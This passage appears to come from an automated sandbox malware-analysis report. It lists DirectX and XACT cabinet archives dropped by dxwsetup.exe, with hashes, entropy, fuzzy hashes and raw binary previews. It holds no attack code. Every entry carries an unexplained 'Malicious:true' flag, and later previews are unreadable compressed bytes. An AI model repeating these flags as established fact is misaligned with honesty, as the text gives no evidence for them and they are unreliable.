File Type:Microsoft Cabinet archive data, many, 1078760 bytes, 5 files, at 0x44 +A "d3dx9_29_x86.cat" +A "d3dx9_29.dll", flags 0x4, ID 6921, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
Category:dropped
Size (bytes):1087928
Entropy (8bit):7.99922866964108
Encrypted:true
SSDEEP:24576:MWlF24ngnZPhX4ciAwvVHgK6SgHY6OmSfLV+:MWls4gnZTmHx6SgnPCY
MD5:F6CC1C08D0F569B5F59108D39CE3508B
SHA1:E9CF7EDC8C9C4B57A9BADD8386A2117EC5785AAB
SHA-256:4114E76799AF3DA9DB3DAE51305DAD70A05B757E506E4A327092D536CCA7EE75
SHA-512:86DF72D5B15396ACB504C1AC9DE7FF5C0CC9C95A90FDD82DAEDC55BAAD490CC47A71CB511571D37E25DD9BC1EE9652B9723E33879BC1756A7881A8E61EBC59ED
Malicious:true
Preview:MSCF cabinet header; member names in the CFFILE entries: d3dx9_29_x86.cat, d3dx9_29.dll, d3dx9_29_w9x.inf, d3dx9_29_x86.inf, feb2006_d3dx9_29_x86.inf (the remainder is compressed data and not printable)

Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 174825 bytes, 6 files, at 0x44 +A "xact2_2_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8466, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
Category:dropped
Size (bytes):183993
Entropy (8bit):7.996017590596314
Encrypted:true
SSDEEP:3072:fC8YuRPaoTUX/SmAwGUGY+geIhVhbjF/kZ8FyQU02JhzqhA7J4rMgThmwQvzb7e:fCoJaoT8/2Z9YA+VhbR8Zwy3RimwQvzm
MD5:D404CCED69740A65A3051766A37D0885
SHA1:288818F41DA8AB694C846961294EE03D52AEA90D
SHA-256:5163AFA067FE2F076AB428DD368BA0A2CF6470457BA528A35E97BE40737A03C0
SHA-512:87998E67B359C2A0D4F05DC102F6C4DB4F260903385B7558A2C1A71436001D5B18F42B984E6B279A8197243593C385D41F51DE630FA31C5CA5140F6970F87657
Malicious:true
Preview:MSCF cabinet header; member names in the CFFILE entries: xact2_2_x64.cat, x3daudio1_0.dll, xactengine2_2.dll, infinst.exe, jun2006_xact_x64.inf, xact2_2_x64.inf (the remainder is compressed data and not printable)

Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 693084 bytes, 7 files, at 0x44 +A "d3dx10_34_x64.cat" +A "d3dcompiler_34.dll", flags 0x4, ID 10180, number 1, extra bytes 20 in head, 61 datablocks, 0x1503 compression
Category:dropped
Size (bytes):702252
Entropy (8bit):7.999542751209748
Encrypted:true
SSDEEP:12288:8B7y3n2GQi70ZEqAEToKVkDYK96luRC/Qwrkxb0b9fhXNkVkN2t3r1:8BO/j0ZWET/isK96luRC/jk49JN2t71
MD5:1AB35D11274D1ADBD316B19C44B9AE41
SHA1:14165EC367CE179588C8A5806FC968FDB49B4ACA
SHA-256:02ED1B5A850EDB52EC174DE177E91842EDC7C5F4C06CEDA5B16F3427DBCD4C99
SHA-512:71C8FAC7C95211D323C4FB6A02916E7D43EE399BBE0F1D983B5AC210F5039B23355F40B36F023F3C36E19787E2871A60CC389E51D6327652CD84D9E3B93D5A4D
Malicious:true
Preview:MSCF cabinet header; member names in the CFFILE entries: d3dx10_34_x64.cat, d3dcompiler_34.dll, d3dx10_34.dll, infinst.exe, d3dx10_34_x64.inf, d3dx10_34_x64_xp.inf, jun2007_d3dx10_34_x64.inf (the remainder is compressed data and not printable)

Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 191323 bytes, 5 files, at 0x44 "d3dx10_43.dll" "d3dx10_43_x86.cat", flags 0x4, ID 7293, number 1, extra bytes 20 in head, 15 datablocks, 0x1 compression
Category:dropped
Size (bytes):200491
Entropy (8bit):7.9966634458730566
Encrypted:true
SSDEEP:3072:kD2Fju8h1xkWCD/5e8U2LK1aQAMxVz2aoOxoY4+ApyP0EwMGvFas+8QJgdBvCD7D:kwbCleyYagxVCaoV+ApcnG9aKQJaw/
MD5:591A61BD06C73C70F93DAC5AF2D8E924
SHA1:C9D36AC5E2ACAC31A7413D22ED1C09C71CC96FFB
SHA-256:F0BC06CEB484D97CF01526F9223DF7B4357D166C4391869F2E7D514DC1FE769B
SHA-512:3E2E3318A700A6ED82A21018403CA99728C8A56B7DF81F99A5D705B586CEE1141586DBF19A01EF1F1A72DDC8F45DDB51BA5769AE4634B02233EF1AC4E0FBA5D4
Malicious:true
Preview:MSCF cabinet header; member names in the CFFILE entries: d3dx10_43.dll, d3dx10_43_x86.cat, d3dx10_43_x86.inf, d3dx10_43_x86_xp.inf, JUN2010_d3dx10_43_x86.inf (the remainder is compressed data and not printable)

Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 1437322 bytes, 5 files, at 0x44 "d3dx9_37.dll" "d3dx9_37_x86.cat", flags 0x4, ID 7166, number 1, extra bytes 20 in head, 116 datablocks, 0x1503 compression
Category:dropped
Size (bytes):1446490
Entropy (8bit):7.99972380205062
Encrypted:true
SSDEEP:24576:vFs/gTzoeHhwLMLDjl5XbCzgxt0Q98wWz35UM0vE03yYCmPI7ik:veKTHhbLDbDP0Q5UUtBC2PAz
MD5:8ED75E3205C2B989FF2B5A7D2F0BA2DF
SHA1:88846203588464C0BA19907C126C72F7D683B793
SHA-256:91A50D9EFCDFBCDF22A91D6FBB0F50D3C2AA75F926D05CC166020BF7AAF30E28
SHA-512:D0CF0E3AAD9C8C43A927D1BBBD253B9FE4C97B638AD9A56F671EBEDA68FC9BC17CC980D93095FBB248DD61DC11B7E46C22D72CEE848B150F7A13EAD9E08A7891
Malicious:true
Preview:MSCF cabinet header; member names in the CFFILE entries: d3dx9_37.dll, d3dx9_37_x86.cat, d3dx9_37_x86.inf, d3dx9_37_x86_xp.inf, Mar2008_d3dx9_37_x86.inf (the remainder is compressed data and not printable)

Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 1606486 bytes, 5 files, at 0x44 "d3dx9_41.dll" "d3dx9_41_x86.cat", flags 0x4, ID 7142, number 1, extra bytes 20 in head, 128 datablocks, 0x1503 compression
Category:dropped
Size (bytes):1615654
Entropy (8bit):7.999772423092358
Encrypted:true
SSDEEP:24576:xFtN95ew18Yl4WTrZnZSibmmq18Whxp9pWISiIz9cXwowwenm2AB4qDA2mV7Q:newRFZ8ib6T3p9pW9/Z4bM/XkA+
MD5:901567428D8C82756D7BF5A406441BD7
SHA1:6E3C22147F3DA77AC8F20D615CA32B5EF2A0ED28
SHA-256:32356344AEDDF709C9D5302D8F3FCC1FF1BE2E82D8D17833A2086400AF248794
SHA-512:6FD4C429E32480BDFF4E58BA8BC0D28FE97C9FF5EF1FABBB856230EFA669246A354F99B723E7483D548B74C121AC8BA9CBA2B5BC3C18F35EE828302D392CF6ED
Malicious:true
Preview:MSCF cabinet header; member names in the CFFILE entries: d3dx9_41.dll, d3dx9_41_x86.cat, d3dx9_41_x86.inf, d3dx9_41_x86_xp.inf, Mar2009_d3dx9_41_x86.inf (the remainder is compressed data and not printable)

Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 132057 bytes, 5 files, at 0x44 +A "xact2_4_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7347, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
Category:dropped
Size (bytes):141225
Entropy (8bit):7.994197909856769
Encrypted:true
SSDEEP:3072:s0cnkrYXa8cJVIajswPlOA//GNzLriX5MMP6:s0OkrcajIaw+neN+XaMy
MD5:4FD2B859952C008DE0542053B15BF0D1
SHA1:0800CEC84B51FC6362C871FAB87A09DB5C4AD6D4
SHA-256:F6B6EBC9C239C5263AAFAA63FD691DA5AA715E9C794D5FD663E86559D5C6AE56
SHA-512:D656C3BFE4593EA9084A5D09F0173C8F6B7D6229FC7E3F6757AC03089CFA94A7337BBEF0456785B79D777B976F5A8259056D2DDCFE0F74D78C304A02BCEE0AD8
Malicious:true
Preview:MSCF cabinet header; member names in the CFFILE entries: xact2_4_x86.cat, x3daudio1_1.dll, xactengine2_4.dll, oct2006_xact_x86.inf, xact2_4_x86.inf (the remainder is compressed data and not printable)

Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 1601398 bytes, 6 files, at 0x44 +A "d3dx9_33_x64.cat" +A "d3dx9_33.dll", flags 0x4, ID 8295, number 1, extra bytes 20 in head, 140 datablocks, 0x1503 compression
Category:dropped
Size (bytes):1610566
Entropy (8bit):7.999804070832858
Encrypted:true
SSDEEP:24576:NjzSeifTXjfzuO/m35sCqSrSBEZqyi2bjbBfQbIKpP5FfiB0Qjq/X1ZXp8e:NvSeSTXj7u0OUM9UStQbNd/Gjq/FD
MD5:F33C12F535DC4121E07938629BC6F5B2
SHA1:6B93FBE3D419670A71813E087D289B77E58E482B
SHA-256:3CA2ACF6B952D6438B91E540F39ABCB93EE12E340BA1302F7406F01568E5CF91
SHA-512:DF1753AB43D5B7FDE2A5EB65A77B37BA28599BC0683A4306F101C75F82B0F1A2C8DDF5741981073CC5DF26E9EA38C9A495ED0FB1689D2E7FC7D6F693759C822A
Malicious:true
Preview:MSCF cabinet header; member names in the CFFILE entries: d3dx9_33_x64.cat, d3dx9_33.dll, infinst.exe, apr2007_d3dx9_33_x64.inf, d3dx9_33_x64.inf, d3dx9_33_x64_xp.inf (the remainder is compressed data and not printable)

Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 1344582 bytes, 5 files, at 0x44 +A "d3dx9_27_x64.cat" +A "d3dx9_27.dll", flags 0x4, ID 6663, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
Category:dropped
Size (bytes):1353750
Entropy (8bit):7.999671999388792
Encrypted:true
SSDEEP:24576:eG/1unuf7Ga2dGKSnUG+zOADaZmd+JzQpymAFVZcRVhZ9k7LN7QDKW+L:eg4G7GaISn+6FZC+5vmC7EUNRWU
MD5:A9F4068650DF203CEE34E2CA39038618
SHA1:CD8CAECEECD01DAC35B198B42725CBEB5B7965A7
SHA-256:3500C1A7CFB5594521338D1C29946D1E4FFA44D5B6BC6CF347C5BBBDE18E94DC
SHA-512:C92FB461B53051A22FB480BA5B6BF2706614AE93BE055B00280BE4DACE19C1F2A9327106A71851B0E42F39E4172EA3A027F7CE878BCBCB252B723EEA49DBCF1B
Malicious:true
Preview:MSCF cabinet header; member names in the CFFILE entries: d3dx9_27_x64.cat, d3dx9_27.dll, infinst.exe, aug2005_d3dx9_27_x64.inf, d3dx9_27_x64.inf (the remainder is compressed data and not printable)
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 186171 bytes, 5 files, at 0x44 "d3dx10_42.dll" "d3dx10_42_x86.cat", flags 0x4, ID 7280, number 1, extra bytes 20 in head, 15 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):195339
                                                                                              Entropy (8bit):7.996178589789764
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:/hxMUzbnbaWbX0JkFvs5aQnkW6sJ/Fw395/lfLxBQLgGlekmQI84HAGujR7j:5CEbiqvs5aQnkW6A/8jlzxBw0/Erd1X
                                                                                              MD5:F264AF5A36B889B4F17EB4D4F9680B4F
                                                                                              SHA1:1DF087EA99D321EC96D0D2F1C66BEE94883D6F08
                                                                                              SHA-256:BB46189EB8CB7769EB7BE00CFBC35902072FA9408313EF53F423E5AE5C728F61
                                                                                              SHA-512:73AE1CF3CAFBA148F4E5B4D8AC12A7AA41F6ECAC86C139C6A7714F90F3DC61C444DC152A3AD3C2CA800C1A1F4955A2B508735F8490666B57D1420FB7A7BFC269
                                                                                              Malicious:true
                                                                                              Preview:MSCF....;.......D...............p...........;....#..................P.........$;....d3dx10_42.dll.....P.....$;...d3dx10_42_x86.cat...........$;...d3dx10_42_x86.inf.(.........$;...d3dx10_42_x86_xp.inf.c.........$;...AUG2009_d3dx10_42_x86.inf.|..f.0..CK..T.I....8*....e0.JVT`..Q......A..a@..i.k..........b.bN......fE.]...y...s._W..~.......9.6.0:../....^.._..F{.3......7.NHL.....T......Z.....Sd.)2W. Y.2Na....^.lk....+......V.J...j.W.vI.Xj.V....Y..^$....&.&....9..azKt..6.*...2..e..).,..6...0,......Z.a...R...k........(..V.E.....2..C....p>r..Y.].sR&....)....i.0.....W..#(.....j.p5.ZvR.!..:.jd..e............7:(..\....kZ..b^...s4W).. L.%......:g......./..5.......eW).....t.2..].... ..X.,.. ~80...v..k.#.1.2.....0..PF.....z.]......\.\.N.E.J`6....p.....@_..;...p.8........x.....y.6.(p.x..XJ..@O........E.v.0p...m4.8.,.6.%...P.lh.. ...B.g..0.....>v.....S.A......E@...0.P..@8....v.9..h....xc*e....'..`..._...........M.lg..P..-.!......L...@$0.........j5..m.{ .H.f.[...C@
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1568416 bytes, 4 files, at 0x44 +A "d3dx9_32_x86.cat" +A "d3dx9_32.dll", flags 0x4, ID 5512, number 1, extra bytes 20 in head, 105 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1577608
                                                                                              Entropy (8bit):7.999092247669469
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:VKo9fY3tlVm3JjPueurZ8zQbC88LHhpu97Sm:V13BFurZ8U18uSm
                                                                                              MD5:A5BEAD938AFDC63ADFECC1DAF5049D7F
                                                                                              SHA1:B3D5BF56F6B9BF87C33009A088BA7785B6363B4E
                                                                                              SHA-256:A1CC7603302EE53D54F4353C223D95E223706924D99B864220B13814EF93EEFB
                                                                                              SHA-512:C9244BBCFE60F347EC8785B1A41B6E243153624EA73B16DB4D624239A69FA76D2DF2E54039D8F4D2C495890AC17B676E390F796118B4E16D9F03683247190362
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............i..............5.a .d3dx9_32_x86.cat..G4.......}5.h .d3dx9_32.dll......f4....5.` .d3dx9_32_x86.inf.M....i4....5.` .dec2006_d3dx9_32_x86.inf.4.$G.@..CK..\.K..?.........7...a....4.... @..LB. `..b..;......{/.;.g7A......}......uv.3.....9X....:.G...`.eT..p...X,..V..C]c.....3^aV......n.*.3..N.0K3s..%.eb...e../...7..$.~.e#+...<....=..U...R...<..I8..H.D..L.. 1.!........np..\...a...D.'....@(:./.A..{...H.e...b...4Y.c.<..P...H..............].;gl.$q.........}..%,.g.....X.C...*HAUZQ1..C.PM.v.\q...T.0Y.3.a.#.\!...O........A)...K....\....PF.X..te...P...B....).).V.(]Jt...A}.S.t|1S#z....\}./.....\..............(..0....'}..N.]......y,..~.R....f.P.E.T....d#.k.b..`P.../..0W.K&....!.!........M......EL&..bBA.b....q.H.Q.5..5..u....{.ka.k.s.PA^.e.5....c#......d...2..).V.e....2.^.;.....L.....s.`.iK...Q..N.Q.%.T......k..M...U...d...H.W..f.I......kF;X..;.%..N.....j.....6......L.T.).JU"["..`....1..........D.QO,..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073496 bytes, 5 files, at 0x44 +A "d3dx9_28_x86.cat" +A "d3dx9_28.dll", flags 0x4, ID 6914, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082664
                                                                                              Entropy (8bit):7.999121865147412
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:Wa0lNxqf7fg42FhNffA/Lj41q7+YeSFfSKidHVmTJwagz8u:WHXx652fNffm0oleSt3Fwa3u
                                                                                              MD5:B1CCAAFF46FE022439F7DE5EB9EC226F
                                                                                              SHA1:8BB7225DF13E6B449D318E2649AEB45A5F24DAF7
                                                                                              SHA-256:645F8D90B07C69330A8C7C8912D70538411C9A6B2813048DA8AD3C3119487F93
                                                                                              SHA-512:2B59C07584D45705273A975A0223E4443DB190675558AB89D92E1572DE4843BE3D0D1267818B19185E4E438A8BCFA2AF5FB5EF2A119DA270BE4540576FD78C77
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Xa......D...........................Xa...#..............H..............3g. .d3dx9_28_x86.cat..t#........3). .d3dx9_28.dll......#....38. .d3dx9_28_w9x.inf.....x.#....38. .d3dx9_28_x86.inf.......#....38. .dec2005_d3dx9_28_x86.inf...a.>..CK..X.[...C.)...1X..S.I...(M@A.......Pm..;......,.`...=.#v.$("..w.{...yN<?..=k.^..=s...o.jw..et.=..YA..=H.eF..l...,;.17kj....+.jw..Y.ry6..\.Y.4.igecJ...,.g.yp.F.yc.....X...e...L6.....SI..j......."6."...2.... ..+..O$B,..6l. ..B1l.`.....A..rN2..ggf..g..... ..H..Dp$.1..h..X.O..Pi...[LC.L..!d.\....fff................lknfYP@_..|...Q4.!.JBJ..0...Ri[4.=..r<...b.3M/F].._S.J.."......"...P%@...`..l..J.*/.!.3.M.....y.l...TI.d*~8.0fwf.J)M.C.U....<n7......./..&..P.R0...Q.JU..2.`...2.ri....vp:.Lg.:(.....7.H2.p.!....N.).A...bg......$..6.M5Nj.e.U..-9..P..L.5...G5.......A.P.6..6..v.i..6..6........-....`.........&3nN..K.&w.g-c....4K.9..}...U}.."VCf}*b]..B..+.j.D..d5`..k...j...4UR..... ..Ux."].d5g6..l.70&.%J.^...Q.U.5...9..~
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 185760 bytes, 4 files, at 0x44 +A "d3dx10_00_x86.cat" +A "d3dx10.dll", flags 0x4, ID 5461, number 1, extra bytes 20 in head, 14 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):194952
                                                                                              Entropy (8bit):7.9966042762544145
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:x4mJ4SadBGg8IZrdosr2nqOwY7l43gRDlcGgp6VMslgVwxikcBmEi21wx8MqX+dN:xJJ4VWgzZptAqOf6wRD5g0VlgVwxL21I
                                                                                              MD5:75C33157D8A1B123D01B2EAC91573C98
                                                                                              SHA1:E3E65896CE0520413979C0143C3AA9BD3A6A27D3
                                                                                              SHA-256:02DAA8B5AC3752F76C3BFD9A505EBF22B1B4B41E44EB92CE2799033B2330D186
                                                                                              SHA-512:F0F1F1DEA5938E1C7FF2ADF7C8D421C2E68E6D3A8CDF18D0F2F3FE1C6837A4F37B367D2D974C35832D1D85A619948DD0F250C7D6DC4AE39F618F5A2893EAC7DD
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............U................#.............................5.a .d3dx10_00_x86.cat...........}5.h .d3dx10.dll............5.` .d3dx10_00_x86.inf............5.` .dec2006_d3dx10_00_x86.inf....9.>..CK..\.K...C..DEA.P.$.......$...%.A.....0 F.Y.s.1#...#..f.......y...}....ZU..jU......SP.=.gB..GQ....>.5.p8.*<%.y3uY.....Xv.....G.S..)/...A.x....@U.GN.....{,.0nI..@.......d.......R..S....s..B.........B...H. ;.. 9..<...nL.5..!..4=.>.o....A..u.i^...dd..x!.....p...@Jn.;H.L...d......&$. ..|<&/;.O...!.A..%##C.RZ...YG....Z.h..ee........+..D...D&.F.....?.a...Io..hg.5..blP..I.......B....`..,.....u..=A...<.%!.8.,.0....b...v.O..a....#.._J....3o.........F..Z {".t\..H..eo..1h.m.0.a....1....Bc..s.^..V..Bq.x...D(.E....@...&......<._..xv......OB....6L......y.. ....$3.....AB.&.cC8C".p.9.,[..mZ...C+....J.....A.04...rY.....7.y..!^....>j.+yj-#.#...h23.e..)....f....k.:@.-..3...,...O..Vl..#....MIK.Yk@j...^!,96O".....T...\.H,IIL....dfXw.u..e.w.F...C...Y).I\....&.[.4.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 139639 bytes, 5 files, at 0x44 +A "xact2_5_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7324, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):148831
                                                                                              Entropy (8bit):7.993942345904899
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:kF/u2w4VarOr9vE3eKgpEUcXDlkCAMsukGtnJW+ATOcfKy:kF/JWg9vE3eKzXDeMpNnUOcfKy
                                                                                              MD5:082B7D69F96799AA2AB1A8EA1FA2AB88
                                                                                              SHA1:75C7032B749259977C947A5103F9A4B92C2025DE
                                                                                              SHA-256:B98E55C654B9EE6F6D040665D932BEA7A1299C56CC9996EEA900AC4F5649C7D3
                                                                                              SHA-512:57C96A4C99AB9A7D33A8CC81A3B4E2AB58FE3A2FBC7F79AD688C7D0257D281C662D4CE0737F68C00D15F715BC6177D2FF9CC32A69CFB77216265FA56FF79DD8A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....w!......D...........................w!...#..................! .........5.a .xact2_5_x86.cat..;..! ....o5.\ .x3daudio1_1.dll.....9[.....5@` .xactengine2_5.dll.W...Q2.....5.` .dec2006_xact_x86.inf......8.....5.` .xact2_5_x86.inf.@.u..;..CK.|.\S.........EY...E.......A..M..dk.P\.DT..V..Rq..R.*.(..V.[m........E....}...}.......{g..9g.9....x!.ZGo....o.)..B...........a8.....^H....C.S.].)e....U.,.}..E...a7..+.......xv.>..H......N.Sp#-t*.J...)...c0'....1w... ..9c8..8.~NP........O7(.b....%.u...T..-.....9*.;........H...~c 7.n>.A9.........W....#..@..p!.G.R1\....B.N.'..Z.c|0..(+.l...<._(6..cYX:&.$p.F?.VK.t.....[|,....q.b.....AS6...h.I.G....1 ...z.....J.j.~..-.H...@.z>.. M...{.".........o7...-....E..C..6..................`...... m)..ad.#.5...p.....j..j|..w...#.j]..BZ.......?oK...=_L.bDD..{.VK^...qe.../x.5.,h....1.".l,.x...N..)..N.A............%.H.k.Dv.4Kd......,..f...lB.QO6.N.(`..D..<W+......j....d....{o..t...e4*.Je.=.w.....773....q...Ha@.*..Q..I.1.N....4
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1007265 bytes, 4 files, at 0x44 +A "d3dx9_24_x86.cat" +A "d3dx9_24.dll", flags 0x4, ID 4987, number 1, extra bytes 20 in head, 69 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1016433
                                                                                              Entropy (8bit):7.998972724711677
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:T/HUK+hlSM4jwe8WpmQUrxiUyULWoF/V++TYrjVdLa1:bHURewe8W4VN8uF/VhMr5s1
                                                                                              MD5:7029866BA46EC477449510BEEE74F473
                                                                                              SHA1:D2F2C21EAB1C277C930A0D2839903ECC55A9B3E8
                                                                                              SHA-256:3D4E48874BDDCD739CF79BF2B3FD195D7C3E861F738DC2EAB19F347545F83068
                                                                                              SHA-512:B8D709775C8D7CA246D0E52FF33017EE9A718B6C97C008181CD0C43DB7E60023D30D2F99A4930EBA124AF2F80452CBF27836D5B87E2968FB0F594ECA1EBF78DD
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....^......D...............{............^...#..............E...7.........E2.. .d3dx9_24_x86.cat...!.7.....E2.. .d3dx9_24.dll......."...92.. .d3dx9_24_w9x.inf......."...92.. .d3dx9_24_x86.inf.(~m.?..CK..\.Y..O..........H.$@..(M..X.. R.I...6...#.^.......{w..}&............{.3..gf.e.....0*`..kFm.......i.`p....X..Y-..7]n^..9...e.(.7..^..V.FO+...v.,e.^..l(i~w...M...l...s...z..U.7.c5.b.3..........#1.I.'.F2.C.@.......'Hx /..K.~.`g.).0..".8y....0.8...N.|..v.u@...P...H.R......c;W....yg..x....s...2..\...}..%21.D..... ...q.....E,.....q.Ee..$...66...pGr}.. +..!&&&PK..f.r...x.'..<.. ....kH..@....~l....\....@fD...+y..:UC.%...zy1.........~j..v..{%..v[S.ZEE...5....i;..1.(...&.x._.......R+[A..l..z(.e. .k..jbf.@.336T.[...'...J/-..uHc.u.....6..U.....).l...&.".9.X..H\.N...d.V.g...^...Jv..PQ~#?....V.......j:..p.....k.R.......0o.~..F..70.).4b7......+.:.&.)Qd(9...i....J35q.....T%..b._....,..........)Qjt.DU.B.R.s..-.`.......4HE...JObJDlG.4x......lb..<..C..sHD.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 172399 bytes, 6 files, at 0x44 +A "xact_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8042, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):181567
                                                                                              Entropy (8bit):7.99567918868168
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:d0F/biJLp9lt7vCmPW8+bobje8bRuaUDuHxiViqmFT8K9rz3a9cO2A2XSHao4svF:KqvlhXu8++q2WuHYrS8ky2A2XKJvub/I
                                                                                              MD5:582102046D298E7B439C819895F6061D
                                                                                              SHA1:09900F44668350118589F18C693B131D7C1F9238
                                                                                              SHA-256:C91A6380C65853E41E2F9593B954F3B5AF49BCC894476D8EB78CD9F8B6DD7DA4
                                                                                              SHA-512:8AABBCBC88489FF8828D532BE5C1BC0D33D7960F41C7B38348AAE73BA4777999F4358466D061DDD8291DBD434E7741EE2C3215A10F8287BE36209E0842C4EB2D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....o.......D...............j...........o....#..................! ........C4.F .xact_x64.cat..@..! ....C4)E .x3daudio1_0.dll..l...`....C4OE .xactengine2_0.dll...........C45E .infinst.exe.z.........C4jF .feb2006_xact_x64.inf...........C4jF .xact_x64.inf.....&9..[.........R.P...O....5p.R...1.!..).a. G7...QJ.........%.G*$...Q.....D..h....v.....f.........q.lv...7.(s@.1.;i..R..7....9+.t<.F.1.84.D...{........f.......iYFdP.Dc.xG.. .0...;...B/IN..x/.w.b..]I... .WAJ.......6....J.8..@.....r.s..NV.#..D.+.c.Y....WQ....'..)`..,.BR.8+I..@....L.9.......8......y...0.u.@...R.../..W.#F...Y].K..C.....t.<E....B... K...A.....<....2.@......f.....`...@x.'..Y.Ab.G]a..X..2.......B.Z.i.../.z...+F.....w..:.+t......e...y.=.a......z.} ..(.{............~|....._Ai=..m.7..s.%...C.H.m.I..PA..O.$..g..PG.2.....5.\...P0.....z.a..#..?m....%.B...T.......v.u..E....3t...G.^......Q..+0..Q...t.....J...!......Y..+....y.w.".Z.@............P`......G....$t..W.'.?....H.^z~./...p..V..I..X...$p..^...
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 127711 bytes, 5 files, at 0x44 +A "xact2_2_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7347, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):136903
                                                                                              Entropy (8bit):7.992894428315885
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:D12mlhVvEbdSlFHljhuz+iFmKtp5LW+pc7Y5EExt2KF3:DwkMhqjhuz+efdLy7YSEP2KF3
                                                                                              MD5:CFCCA19D60EC3D822ED5EC8BBADEC941
                                                                                              SHA1:AB0E87182877991810AF48F1478906C1E671829E
                                                                                              SHA-256:23495764ABA10FF35CF9D23AEEFFDF38716219D8A155AE29162F01F7FE6A30CF
                                                                                              SHA-512:2ACAEA2DE2D77BBE8206E8309D48A4CBA432D72FB9BDE2576BCE7A31EE29FDCB0D44C2B996E8DC21A31BCDB03C806E11AD53B74D9C4C972436D5202825900C01
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! .........4=< .xact2_2_x86.cat..6..! ....C4-E .x3daudio1_0.dll......V.....4.; .xactengine2_2.dll.W..........4.; .jun2006_xact_x86.inf.....`......4.; .xact2_2_x86.inf.r....8..CK.|.\....l...Y.".....Y.(H^.@.`@$,.Jr...#..+.....'b.'f.......x;..S.TL.....]t.w...{.{..s...........8f.ZC..._.P4..y....R(......'.j...<.%.-k.....M).W..8...V.Y....2`O..>q....jO..1....;.\{...'.=...+-.....:`.....c..t..1o..`<..0G.y..e.r|..r>P..9.({C-.r.@..8~..qs...>6G.r.....@...]0/..Vl.....q....l....j..... .#...o..J.p.6..:w.>..W....iTFi)..<..s#.AX.&..dL.I.vG?.BM.t...._.X...a....%..Wd.*5.$.#{..?G..Gj..ds.._..7@.@JG.G~*]:.=v&..'u.......bb...`g......`..s.)?Rj;..K....#..Im(.....Lq.........'5..p...xl.^..!.05H..P._*.....hf..3c{.H..I|........DB...9.?1..y...}.&;..c......tl...w2..`.:......q{s......`"...R..p..W.p.....vc3...6A..;..v..`b.D..<W-o.....;.....jy.2...zm..t.n.R..B..G...Vq.....).:.M...Ha@...Q..N.0.N.......4`E....(....
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 692512 bytes, 6 files, at 0x44 +A "d3dx10_34_x86.cat" +A "d3dcompiler_34.dll", flags 0x4, ID 9065, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
